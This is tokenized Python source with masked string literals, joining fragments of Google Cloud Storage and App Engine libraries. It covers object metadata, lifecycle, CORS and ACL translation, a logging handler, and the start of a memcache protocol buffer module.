I ) <EOL> CUSTOM_AMZ_METADATA_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CUSTOM_AMZ_HEADER_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> S3_ACL_MARKER_GUID = '<STR_LIT>' <EOL> S3_DELETE_MARKER_GUID = '<STR_LIT>' <EOL> S3_MARKER_GUIDS = [ S3_ACL_MARKER_GUID , S3_DELETE_MARKER_GUID ] <EOL> S3_HEADER_PREFIX = '<STR_LIT>' <EOL> DEFAULT_CONTENT_TYPE = '<STR_LIT>' <EOL> REMOVE_CORS_CONFIG = [ apitools_messages . Bucket . CorsValueListEntry ( <EOL> maxAgeSeconds = - <NUM_LIT:1> , method = [ '<STR_LIT>' ] ) ] <EOL> PRIVATE_DEFAULT_OBJ_ACL = apitools_messages . ObjectAccessControl ( <EOL> id = '<STR_LIT>' ) <EOL> def ObjectMetadataFromHeaders ( headers ) : <EOL> """<STR_LIT>""" <EOL> obj_metadata = apitools_messages . Object ( ) <EOL> for header , value in headers . items ( ) : <EOL> if CACHE_CONTROL_REGEX . match ( header ) : <EOL> obj_metadata . cacheControl = value . strip ( ) <EOL> elif CONTENT_DISPOSITION_REGEX . match ( header ) : <EOL> obj_metadata . contentDisposition = value . strip ( ) <EOL> elif CONTENT_ENCODING_REGEX . match ( header ) : <EOL> obj_metadata . contentEncoding = value . strip ( ) <EOL> elif CONTENT_MD5_REGEX . match ( header ) : <EOL> obj_metadata . md5Hash = value . strip ( ) <EOL> elif CONTENT_LANGUAGE_REGEX . match ( header ) : <EOL> obj_metadata . contentLanguage = value . strip ( ) <EOL> elif CONTENT_TYPE_REGEX . match ( header ) : <EOL> if not value : <EOL> obj_metadata . contentType = DEFAULT_CONTENT_TYPE <EOL> else : <EOL> obj_metadata . contentType = value . strip ( ) <EOL> elif GOOG_API_VERSION_REGEX . match ( header ) : <EOL> continue <EOL> elif GOOG_GENERATION_MATCH_REGEX . match ( header ) : <EOL> continue <EOL> elif GOOG_METAGENERATION_MATCH_REGEX . match ( header ) : <EOL> continue <EOL> else : <EOL> custom_goog_metadata_match = CUSTOM_GOOG_METADATA_REGEX . match ( header ) <EOL> custom_amz_metadata_match = CUSTOM_AMZ_METADATA_REGEX . match ( header ) <EOL> custom_amz_header_match = CUSTOM_AMZ_HEADER_REGEX . 
match ( header ) <EOL> header_key = None <EOL> if custom_goog_metadata_match : <EOL> header_key = custom_goog_metadata_match . group ( '<STR_LIT>' ) <EOL> elif custom_amz_metadata_match : <EOL> header_key = custom_amz_metadata_match . group ( '<STR_LIT>' ) <EOL> elif custom_amz_header_match : <EOL> header_key = ( S3_HEADER_PREFIX + <EOL> custom_amz_header_match . group ( '<STR_LIT>' ) ) <EOL> if header_key : <EOL> if header_key . lower ( ) == '<STR_LIT>' : <EOL> continue <EOL> if not obj_metadata . metadata : <EOL> obj_metadata . metadata = apitools_messages . Object . MetadataValue ( ) <EOL> if not obj_metadata . metadata . additionalProperties : <EOL> obj_metadata . metadata . additionalProperties = [ ] <EOL> obj_metadata . metadata . additionalProperties . append ( <EOL> apitools_messages . Object . MetadataValue . AdditionalProperty ( <EOL> key = header_key , value = value ) ) <EOL> else : <EOL> raise ArgumentException ( <EOL> '<STR_LIT>' % ( header , value ) ) <EOL> return obj_metadata <EOL> def HeadersFromObjectMetadata ( dst_obj_metadata , provider ) : <EOL> """<STR_LIT>""" <EOL> headers = { } <EOL> if not dst_obj_metadata : <EOL> return <EOL> if dst_obj_metadata . cacheControl is not None : <EOL> if not dst_obj_metadata . cacheControl : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . cacheControl . strip ( ) <EOL> if dst_obj_metadata . contentDisposition : <EOL> if not dst_obj_metadata . contentDisposition : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = ( <EOL> dst_obj_metadata . contentDisposition . strip ( ) ) <EOL> if dst_obj_metadata . contentEncoding : <EOL> if not dst_obj_metadata . contentEncoding : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . contentEncoding . strip ( ) <EOL> if dst_obj_metadata . contentLanguage : <EOL> if not dst_obj_metadata . 
contentLanguage : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . contentLanguage . strip ( ) <EOL> if dst_obj_metadata . md5Hash : <EOL> if not dst_obj_metadata . md5Hash : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . md5Hash . strip ( ) <EOL> if dst_obj_metadata . contentType is not None : <EOL> if not dst_obj_metadata . contentType : <EOL> headers [ '<STR_LIT>' ] = None <EOL> else : <EOL> headers [ '<STR_LIT>' ] = dst_obj_metadata . contentType . strip ( ) <EOL> if ( dst_obj_metadata . metadata and <EOL> dst_obj_metadata . metadata . additionalProperties ) : <EOL> for additional_property in dst_obj_metadata . metadata . additionalProperties : <EOL> if additional_property . key == '<STR_LIT>' : <EOL> continue <EOL> if additional_property . key in S3_MARKER_GUIDS : <EOL> continue <EOL> if provider == '<STR_LIT>' : <EOL> header_name = '<STR_LIT>' + additional_property . key <EOL> elif provider == '<STR_LIT>' : <EOL> if additional_property . key . startswith ( S3_HEADER_PREFIX ) : <EOL> header_name = ( '<STR_LIT>' + <EOL> additional_property . key [ len ( S3_HEADER_PREFIX ) : ] ) <EOL> else : <EOL> header_name = '<STR_LIT>' + additional_property . key <EOL> else : <EOL> raise ArgumentException ( '<STR_LIT>' % provider ) <EOL> if ( additional_property . value is not None and <EOL> not additional_property . value ) : <EOL> headers [ header_name ] = None <EOL> else : <EOL> headers [ header_name ] = additional_property . value <EOL> return headers <EOL> def CopyObjectMetadata ( src_obj_metadata , dst_obj_metadata , override = False ) : <EOL> """<STR_LIT>""" <EOL> if override or not dst_obj_metadata . cacheControl : <EOL> dst_obj_metadata . cacheControl = src_obj_metadata . cacheControl <EOL> if override or not dst_obj_metadata . contentDisposition : <EOL> dst_obj_metadata . contentDisposition = src_obj_metadata . 
contentDisposition <EOL> if override or not dst_obj_metadata . contentEncoding : <EOL> dst_obj_metadata . contentEncoding = src_obj_metadata . contentEncoding <EOL> if override or not dst_obj_metadata . contentLanguage : <EOL> dst_obj_metadata . contentLanguage = src_obj_metadata . contentLanguage <EOL> if override or not dst_obj_metadata . contentType : <EOL> dst_obj_metadata . contentType = src_obj_metadata . contentType <EOL> if override or not dst_obj_metadata . md5Hash : <EOL> dst_obj_metadata . md5Hash = src_obj_metadata . md5Hash <EOL> if ( src_obj_metadata . metadata and <EOL> src_obj_metadata . metadata . additionalProperties ) : <EOL> if not dst_obj_metadata . metadata : <EOL> dst_obj_metadata . metadata = apitools_messages . Object . MetadataValue ( ) <EOL> if not dst_obj_metadata . metadata . additionalProperties : <EOL> dst_obj_metadata . metadata . additionalProperties = [ ] <EOL> dst_metadata_dict = { } <EOL> for dst_prop in dst_obj_metadata . metadata . additionalProperties : <EOL> dst_metadata_dict [ dst_prop . key ] = dst_prop . value <EOL> for src_prop in src_obj_metadata . metadata . additionalProperties : <EOL> if src_prop . key in dst_metadata_dict : <EOL> if override : <EOL> if src_prop . value is not None and not src_prop . value : <EOL> dst_metadata_dict [ src_prop . key ] = None <EOL> else : <EOL> dst_metadata_dict [ src_prop . key ] = src_prop . value <EOL> else : <EOL> dst_metadata_dict [ src_prop . key ] = src_prop . value <EOL> dst_obj_metadata . metadata . additionalProperties = [ ] <EOL> for k , v in dst_metadata_dict . iteritems ( ) : <EOL> dst_obj_metadata . metadata . additionalProperties . append ( <EOL> apitools_messages . Object . MetadataValue . AdditionalProperty ( key = k , <EOL> value = v ) ) <EOL> def PreconditionsFromHeaders ( headers ) : <EOL> """<STR_LIT>""" <EOL> return_preconditions = Preconditions ( ) <EOL> try : <EOL> for header , value in headers . items ( ) : <EOL> if GOOG_GENERATION_MATCH_REGEX . 
match ( header ) : <EOL> return_preconditions . gen_match = long ( value ) <EOL> if GOOG_METAGENERATION_MATCH_REGEX . match ( header ) : <EOL> return_preconditions . meta_gen_match = long ( value ) <EOL> except ValueError , _ : <EOL> raise ArgumentException ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return return_preconditions <EOL> def CreateNotFoundExceptionForObjectWrite ( <EOL> dst_provider , dst_bucket_name , src_provider = None , <EOL> src_bucket_name = None , src_object_name = None , src_generation = None ) : <EOL> """<STR_LIT>""" <EOL> dst_url_string = '<STR_LIT>' % ( dst_provider , dst_bucket_name ) <EOL> if src_bucket_name and src_object_name : <EOL> src_url_string = '<STR_LIT>' % ( src_provider , src_bucket_name , <EOL> src_object_name ) <EOL> if src_generation : <EOL> src_url_string += '<STR_LIT>' % str ( src_generation ) <EOL> return NotFoundException ( <EOL> '<STR_LIT>' % <EOL> ( src_url_string , dst_url_string ) ) <EOL> return NotFoundException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % dst_url_string ) <EOL> def CreateBucketNotFoundException ( code , provider , bucket_name ) : <EOL> return BucketNotFoundException ( '<STR_LIT>' % <EOL> ( provider , bucket_name ) , bucket_name , <EOL> status = code ) <EOL> def CreateObjectNotFoundException ( code , provider , bucket_name , object_name , <EOL> generation = None ) : <EOL> uri_string = '<STR_LIT>' % ( provider , bucket_name , object_name ) <EOL> if generation : <EOL> uri_string += '<STR_LIT>' % str ( generation ) <EOL> return NotFoundException ( '<STR_LIT>' % uri_string , status = code ) <EOL> def EncodeStringAsLong ( string_to_convert ) : <EOL> """<STR_LIT>""" <EOL> return long ( string_to_convert . encode ( '<STR_LIT>' ) , <NUM_LIT:16> ) <EOL> def _DecodeLongAsString ( long_to_convert ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( long_to_convert , basestring ) : <EOL> return long_to_convert <EOL> return hex ( long_to_convert ) [ <NUM_LIT:2> : - <NUM_LIT:1> ] . 
decode ( '<STR_LIT>' ) <EOL> def GenerationFromUrlAndString ( url , generation ) : <EOL> """<STR_LIT>""" <EOL> if url . scheme == '<STR_LIT>' and generation : <EOL> return _DecodeLongAsString ( generation ) <EOL> return generation <EOL> def CheckForXmlConfigurationAndRaise ( config_type_string , json_txt ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> xml . etree . ElementTree . fromstring ( str ( json_txt ) ) <EOL> raise ArgumentException ( '<STR_LIT:\n>' . join ( textwrap . wrap ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( config_type_string , <EOL> config_type_string . lower ( ) ) ) ) ) <EOL> except XmlParseError : <EOL> pass <EOL> raise ArgumentException ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( config_type_string , json_txt ) ) <EOL> class LifecycleTranslation ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def BotoLifecycleFromMessage ( cls , lifecycle_message ) : <EOL> """<STR_LIT>""" <EOL> boto_lifecycle = boto . gs . lifecycle . LifecycleConfig ( ) <EOL> if lifecycle_message : <EOL> for rule_message in lifecycle_message . rule : <EOL> boto_rule = boto . gs . lifecycle . Rule ( ) <EOL> if ( rule_message . action and rule_message . action . type and <EOL> rule_message . action . type . lower ( ) == '<STR_LIT>' ) : <EOL> boto_rule . action = boto . gs . lifecycle . DELETE <EOL> if rule_message . condition : <EOL> if rule_message . condition . age : <EOL> boto_rule . conditions [ boto . gs . lifecycle . AGE ] = ( <EOL> str ( rule_message . condition . age ) ) <EOL> if rule_message . condition . createdBefore : <EOL> boto_rule . conditions [ boto . gs . lifecycle . CREATED_BEFORE ] = ( <EOL> str ( rule_message . condition . createdBefore ) ) <EOL> if rule_message . condition . isLive : <EOL> boto_rule . conditions [ boto . gs . lifecycle . IS_LIVE ] = ( <EOL> str ( rule_message . condition . isLive ) ) <EOL> if rule_message . condition . numNewerVersions : <EOL> boto_rule . conditions [ boto . gs . 
lifecycle . NUM_NEWER_VERSIONS ] = ( <EOL> str ( rule_message . condition . numNewerVersions ) ) <EOL> boto_lifecycle . append ( boto_rule ) <EOL> return boto_lifecycle <EOL> @ classmethod <EOL> def BotoLifecycleToMessage ( cls , boto_lifecycle ) : <EOL> """<STR_LIT>""" <EOL> lifecycle_message = None <EOL> if boto_lifecycle : <EOL> lifecycle_message = apitools_messages . Bucket . LifecycleValue ( ) <EOL> for boto_rule in boto_lifecycle : <EOL> lifecycle_rule = ( <EOL> apitools_messages . Bucket . LifecycleValue . RuleValueListEntry ( ) ) <EOL> lifecycle_rule . condition = ( apitools_messages . Bucket . LifecycleValue . <EOL> RuleValueListEntry . ConditionValue ( ) ) <EOL> if boto_rule . action and boto_rule . action == boto . gs . lifecycle . DELETE : <EOL> lifecycle_rule . action = ( apitools_messages . Bucket . LifecycleValue . <EOL> RuleValueListEntry . ActionValue ( <EOL> type = '<STR_LIT>' ) ) <EOL> if boto . gs . lifecycle . AGE in boto_rule . conditions : <EOL> lifecycle_rule . condition . age = int ( <EOL> boto_rule . conditions [ boto . gs . lifecycle . AGE ] ) <EOL> if boto . gs . lifecycle . CREATED_BEFORE in boto_rule . conditions : <EOL> lifecycle_rule . condition . createdBefore = ( <EOL> LifecycleTranslation . TranslateBotoLifecycleTimestamp ( <EOL> boto_rule . conditions [ boto . gs . lifecycle . CREATED_BEFORE ] ) ) <EOL> if boto . gs . lifecycle . IS_LIVE in boto_rule . conditions : <EOL> lifecycle_rule . condition . isLive = bool ( <EOL> boto_rule . conditions [ boto . gs . lifecycle . IS_LIVE ] ) <EOL> if boto . gs . lifecycle . NUM_NEWER_VERSIONS in boto_rule . conditions : <EOL> lifecycle_rule . condition . numNewerVersions = int ( <EOL> boto_rule . conditions [ boto . gs . lifecycle . NUM_NEWER_VERSIONS ] ) <EOL> lifecycle_message . rule . append ( lifecycle_rule ) <EOL> return lifecycle_message <EOL> @ classmethod <EOL> def JsonLifecycleFromMessage ( cls , lifecycle_message ) : <EOL> """<STR_LIT>""" <EOL> return str ( encoding . 
MessageToJson ( lifecycle_message ) ) + '<STR_LIT:\n>' <EOL> @ classmethod <EOL> def JsonLifecycleToMessage ( cls , json_txt ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> deserialized_lifecycle = json . loads ( json_txt ) <EOL> if '<STR_LIT>' in deserialized_lifecycle : <EOL> deserialized_lifecycle = deserialized_lifecycle [ '<STR_LIT>' ] <EOL> lifecycle = encoding . DictToMessage ( <EOL> deserialized_lifecycle , apitools_messages . Bucket . LifecycleValue ) <EOL> return lifecycle <EOL> except ValueError : <EOL> CheckForXmlConfigurationAndRaise ( '<STR_LIT>' , json_txt ) <EOL> @ classmethod <EOL> def TranslateBotoLifecycleTimestamp ( cls , lifecycle_datetime ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( lifecycle_datetime , '<STR_LIT>' ) . date ( ) <EOL> class CorsTranslation ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def BotoCorsFromMessage ( cls , cors_message ) : <EOL> """<STR_LIT>""" <EOL> cors = boto . gs . cors . Cors ( ) <EOL> cors . cors = [ ] <EOL> for collection_message in cors_message : <EOL> collection_elements = [ ] <EOL> if collection_message . maxAgeSeconds : <EOL> collection_elements . append ( ( boto . gs . cors . MAXAGESEC , <EOL> str ( collection_message . maxAgeSeconds ) ) ) <EOL> if collection_message . method : <EOL> method_elements = [ ] <EOL> for method in collection_message . method : <EOL> method_elements . append ( ( boto . gs . cors . METHOD , method ) ) <EOL> collection_elements . append ( ( boto . gs . cors . METHODS , method_elements ) ) <EOL> if collection_message . origin : <EOL> origin_elements = [ ] <EOL> for origin in collection_message . origin : <EOL> origin_elements . append ( ( boto . gs . cors . ORIGIN , origin ) ) <EOL> collection_elements . append ( ( boto . gs . cors . ORIGINS , origin_elements ) ) <EOL> if collection_message . responseHeader : <EOL> header_elements = [ ] <EOL> for header in collection_message . responseHeader : <EOL> header_elements . append ( ( boto . gs . 
cors . HEADER , header ) ) <EOL> collection_elements . append ( ( boto . gs . cors . HEADERS , header_elements ) ) <EOL> cors . cors . append ( collection_elements ) <EOL> return cors <EOL> @ classmethod <EOL> def BotoCorsToMessage ( cls , boto_cors ) : <EOL> """<STR_LIT>""" <EOL> message_cors = [ ] <EOL> if boto_cors . cors : <EOL> for cors_collection in boto_cors . cors : <EOL> if cors_collection : <EOL> collection_message = apitools_messages . Bucket . CorsValueListEntry ( ) <EOL> for element_tuple in cors_collection : <EOL> if element_tuple [ <NUM_LIT:0> ] == boto . gs . cors . MAXAGESEC : <EOL> collection_message . maxAgeSeconds = int ( element_tuple [ <NUM_LIT:1> ] ) <EOL> if element_tuple [ <NUM_LIT:0> ] == boto . gs . cors . METHODS : <EOL> for method_tuple in element_tuple [ <NUM_LIT:1> ] : <EOL> collection_message . method . append ( method_tuple [ <NUM_LIT:1> ] ) <EOL> if element_tuple [ <NUM_LIT:0> ] == boto . gs . cors . ORIGINS : <EOL> for origin_tuple in element_tuple [ <NUM_LIT:1> ] : <EOL> collection_message . origin . append ( origin_tuple [ <NUM_LIT:1> ] ) <EOL> if element_tuple [ <NUM_LIT:0> ] == boto . gs . cors . HEADERS : <EOL> for header_tuple in element_tuple [ <NUM_LIT:1> ] : <EOL> collection_message . responseHeader . append ( header_tuple [ <NUM_LIT:1> ] ) <EOL> message_cors . append ( collection_message ) <EOL> return message_cors <EOL> @ classmethod <EOL> def JsonCorsToMessageEntries ( cls , json_cors ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> deserialized_cors = json . loads ( json_cors ) <EOL> cors = [ ] <EOL> for cors_entry in deserialized_cors : <EOL> cors . append ( encoding . DictToMessage ( <EOL> cors_entry , apitools_messages . Bucket . 
CorsValueListEntry ) ) <EOL> return cors <EOL> except ValueError : <EOL> CheckForXmlConfigurationAndRaise ( '<STR_LIT>' , json_cors ) <EOL> @ classmethod <EOL> def MessageEntriesToJson ( cls , cors_message ) : <EOL> """<STR_LIT>""" <EOL> json_text = '<STR_LIT>' <EOL> json_text += '<STR_LIT:[>' <EOL> printed_one = False <EOL> for cors_entry in cors_message : <EOL> if printed_one : <EOL> json_text += '<STR_LIT:U+002C>' <EOL> else : <EOL> printed_one = True <EOL> json_text += encoding . MessageToJson ( cors_entry ) <EOL> json_text += '<STR_LIT>' <EOL> return json_text <EOL> def S3MarkerAclFromObjectMetadata ( object_metadata ) : <EOL> """<STR_LIT>""" <EOL> if ( object_metadata and object_metadata . metadata and <EOL> object_metadata . metadata . additionalProperties ) : <EOL> for prop in object_metadata . metadata . additionalProperties : <EOL> if prop . key == S3_ACL_MARKER_GUID : <EOL> return prop . value <EOL> def AddS3MarkerAclToObjectMetadata ( object_metadata , acl_text ) : <EOL> """<STR_LIT>""" <EOL> if not object_metadata . metadata : <EOL> object_metadata . metadata = apitools_messages . Object . MetadataValue ( ) <EOL> if not object_metadata . metadata . additionalProperties : <EOL> object_metadata . metadata . additionalProperties = [ ] <EOL> object_metadata . metadata . additionalProperties . append ( <EOL> apitools_messages . Object . MetadataValue . AdditionalProperty ( <EOL> key = S3_ACL_MARKER_GUID , value = acl_text ) ) <EOL> class AclTranslation ( object ) : <EOL> """<STR_LIT>""" <EOL> JSON_TO_XML_ROLES = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> XML_TO_JSON_ROLES = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> @ classmethod <EOL> def BotoAclFromJson ( cls , acl_json ) : <EOL> acl = ACL ( ) <EOL> acl . parent = None <EOL> acl . entries = cls . 
BotoEntriesFromJson ( acl_json , acl ) <EOL> return acl <EOL> @ classmethod <EOL> def BotoAclFromMessage ( cls , acl_message ) : <EOL> acl_dicts = [ ] <EOL> for message in acl_message : <EOL> if message == PRIVATE_DEFAULT_OBJ_ACL : <EOL> break <EOL> acl_dicts . append ( encoding . MessageToDict ( message ) ) <EOL> return cls . BotoAclFromJson ( acl_dicts ) <EOL> @ classmethod <EOL> def BotoAclToJson ( cls , acl ) : <EOL> if hasattr ( acl , '<STR_LIT>' ) : <EOL> return cls . BotoEntriesToJson ( acl . entries ) <EOL> return [ ] <EOL> @ classmethod <EOL> def BotoObjectAclToMessage ( cls , acl ) : <EOL> for entry in cls . BotoAclToJson ( acl ) : <EOL> message = encoding . DictToMessage ( entry , <EOL> apitools_messages . ObjectAccessControl ) <EOL> message . kind = u'<STR_LIT>' <EOL> yield message <EOL> @ classmethod <EOL> def BotoBucketAclToMessage ( cls , acl ) : <EOL> for entry in cls . BotoAclToJson ( acl ) : <EOL> message = encoding . DictToMessage ( entry , <EOL> apitools_messages . BucketAccessControl ) <EOL> message . kind = u'<STR_LIT>' <EOL> yield message <EOL> @ classmethod <EOL> def BotoEntriesFromJson ( cls , acl_json , parent ) : <EOL> entries = Entries ( parent ) <EOL> entries . parent = parent <EOL> entries . entry_list = [ cls . BotoEntryFromJson ( entry_json ) <EOL> for entry_json in acl_json ] <EOL> return entries <EOL> @ classmethod <EOL> def BotoEntriesToJson ( cls , entries ) : <EOL> return [ cls . BotoEntryToJson ( entry ) for entry in entries . entry_list ] <EOL> @ classmethod <EOL> def BotoEntryFromJson ( cls , entry_json ) : <EOL> """<STR_LIT>""" <EOL> entity = entry_json [ '<STR_LIT>' ] <EOL> permission = cls . JSON_TO_XML_ROLES [ entry_json [ '<STR_LIT>' ] ] <EOL> if entity . lower ( ) == ALL_USERS . lower ( ) : <EOL> return Entry ( type = ALL_USERS , permission = permission ) <EOL> elif entity . lower ( ) == ALL_AUTHENTICATED_USERS . 
lower ( ) : <EOL> return Entry ( type = ALL_AUTHENTICATED_USERS , permission = permission ) <EOL> elif entity . startswith ( '<STR_LIT>' ) : <EOL> raise CommandException ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> elif '<STR_LIT:email>' in entry_json : <EOL> if entity . startswith ( '<STR_LIT:user>' ) : <EOL> scope_type = USER_BY_EMAIL <EOL> elif entity . startswith ( '<STR_LIT>' ) : <EOL> scope_type = GROUP_BY_EMAIL <EOL> return Entry ( type = scope_type , email_address = entry_json [ '<STR_LIT:email>' ] , <EOL> permission = permission ) <EOL> elif '<STR_LIT>' in entry_json : <EOL> if entity . startswith ( '<STR_LIT:user>' ) : <EOL> scope_type = USER_BY_ID <EOL> elif entity . startswith ( '<STR_LIT>' ) : <EOL> scope_type = GROUP_BY_ID <EOL> return Entry ( type = scope_type , id = entry_json [ '<STR_LIT>' ] , <EOL> permission = permission ) <EOL> elif '<STR_LIT>' in entry_json : <EOL> if entity . startswith ( '<STR_LIT>' ) : <EOL> scope_type = GROUP_BY_DOMAIN <EOL> return Entry ( type = scope_type , domain = entry_json [ '<STR_LIT>' ] , <EOL> permission = permission ) <EOL> raise CommandException ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def BotoEntryToJson ( cls , entry ) : <EOL> """<STR_LIT>""" <EOL> acl_entry_json = { } <EOL> scope_type_lower = entry . scope . type . lower ( ) <EOL> if scope_type_lower == ALL_USERS . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif scope_type_lower == ALL_AUTHENTICATED_USERS . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif scope_type_lower == USER_BY_EMAIL . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . email_address <EOL> acl_entry_json [ '<STR_LIT:email>' ] = entry . scope . email_address <EOL> elif scope_type_lower == USER_BY_ID . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . id <EOL> acl_entry_json [ '<STR_LIT>' ] = entry . scope . id <EOL> elif scope_type_lower == GROUP_BY_EMAIL . 
lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . email_address <EOL> acl_entry_json [ '<STR_LIT:email>' ] = entry . scope . email_address <EOL> elif scope_type_lower == GROUP_BY_ID . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . id <EOL> acl_entry_json [ '<STR_LIT>' ] = entry . scope . id <EOL> elif scope_type_lower == GROUP_BY_DOMAIN . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . domain <EOL> acl_entry_json [ '<STR_LIT>' ] = entry . scope . domain <EOL> else : <EOL> raise ArgumentException ( '<STR_LIT>' % <EOL> scope_type_lower ) <EOL> acl_entry_json [ '<STR_LIT>' ] = cls . XML_TO_JSON_ROLES [ entry . permission ] <EOL> return acl_entry_json <EOL> @ classmethod <EOL> def JsonToMessage ( cls , json_data , message_type ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> deserialized_acl = json . loads ( json_data ) <EOL> acl = [ ] <EOL> for acl_entry in deserialized_acl : <EOL> acl . append ( encoding . DictToMessage ( acl_entry , message_type ) ) <EOL> return acl <EOL> except ValueError : <EOL> CheckForXmlConfigurationAndRaise ( '<STR_LIT>' , json_data ) <EOL> @ classmethod <EOL> def JsonFromMessage ( cls , acl ) : <EOL> """<STR_LIT>""" <EOL> serializable_acl = [ ] <EOL> if acl is not None : <EOL> for acl_entry in acl : <EOL> if acl_entry . kind == u'<STR_LIT>' : <EOL> acl_entry . object = None <EOL> acl_entry . generation = None <EOL> acl_entry . kind = None <EOL> acl_entry . bucket = None <EOL> acl_entry . id = None <EOL> acl_entry . selfLink = None <EOL> acl_entry . etag = None <EOL> serializable_acl . append ( encoding . MessageToDict ( acl_entry ) ) <EOL> return json . dumps ( serializable_acl , sort_keys = True , <EOL> indent = <NUM_LIT:2> , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) </s>
<s> """<STR_LIT>""" <EOL> import inspect <EOL> import logging <EOL> from google . appengine import runtime <EOL> from google . appengine . api import logservice <EOL> from google . appengine . runtime import features <EOL> NEWLINE_REPLACEMENT = "<STR_LIT>" <EOL> class AppLogsHandler ( logging . Handler ) : <EOL> """<STR_LIT>""" <EOL> def emit ( self , record ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if features . IsEnabled ( "<STR_LIT>" ) : <EOL> logservice . write_record ( self . _AppLogsLevel ( record . levelno ) , <EOL> record . created , <EOL> self . format ( record ) , <EOL> self . _AppLogsLocation ( ) ) <EOL> else : <EOL> message = self . _AppLogsMessage ( record ) <EOL> if isinstance ( message , unicode ) : <EOL> message = message . encode ( "<STR_LIT>" ) <EOL> logservice . write ( message ) <EOL> except ( KeyboardInterrupt , SystemExit , runtime . DeadlineExceededError ) : <EOL> raise <EOL> except : <EOL> self . handleError ( record ) <EOL> def _AppLogsMessage ( self , record ) : <EOL> """<STR_LIT>""" <EOL> message = self . format ( record ) . replace ( "<STR_LIT:\r\n>" , NEWLINE_REPLACEMENT ) <EOL> message = message . replace ( "<STR_LIT:\r>" , NEWLINE_REPLACEMENT ) <EOL> message = message . replace ( "<STR_LIT:\n>" , NEWLINE_REPLACEMENT ) <EOL> return "<STR_LIT>" % ( self . _AppLogsLevel ( record . levelno ) , <EOL> long ( record . created * <NUM_LIT:1000> * <NUM_LIT:1000> ) , <EOL> message ) <EOL> def _AppLogsLevel ( self , level ) : <EOL> """<STR_LIT>""" <EOL> if level >= logging . CRITICAL : <EOL> return <NUM_LIT:4> <EOL> elif level >= logging . ERROR : <EOL> return <NUM_LIT:3> <EOL> elif level >= logging . WARNING : <EOL> return <NUM_LIT:2> <EOL> elif level >= logging . INFO : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _AppLogsLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> if not features . IsEnabled ( "<STR_LIT>" ) : <EOL> return None <EOL> def IsLogging ( f ) : <EOL> return f . f_code . co_filename . 
endswith ( "<STR_LIT>" ) <EOL> f = inspect . currentframe ( ) <EOL> while f and not IsLogging ( f ) : <EOL> f = f . f_back <EOL> while f and IsLogging ( f ) : <EOL> f = f . f_back <EOL> return inspect . getframeinfo ( f ) [ : <NUM_LIT:3> ] if f else None </s>
<s> """<STR_LIT>""" <EOL> from file import * <EOL> import blobstore <EOL> import gs <EOL> import shuffler </s>
<s> from google . net . proto import ProtocolBuffer <EOL> import array <EOL> import dummy_thread as thread <EOL> __pychecker__ = """<STR_LIT>""" <EOL> if hasattr ( ProtocolBuffer , '<STR_LIT>' ) : <EOL> _extension_runtime = True <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ExtendableProtocolMessage <EOL> else : <EOL> _extension_runtime = False <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ProtocolMessage <EOL> class MemcacheServiceError ( ProtocolBuffer . ProtocolMessage ) : <EOL> OK = <NUM_LIT:0> <EOL> UNSPECIFIED_ERROR = <NUM_LIT:1> <EOL> NAMESPACE_NOT_SET = <NUM_LIT:2> <EOL> PERMISSION_DENIED = <NUM_LIT:3> <EOL> INVALID_VALUE = <NUM_LIT:6> <EOL> UNAVAILABLE = <NUM_LIT:9> <EOL> _ErrorCode_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT:OK>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , 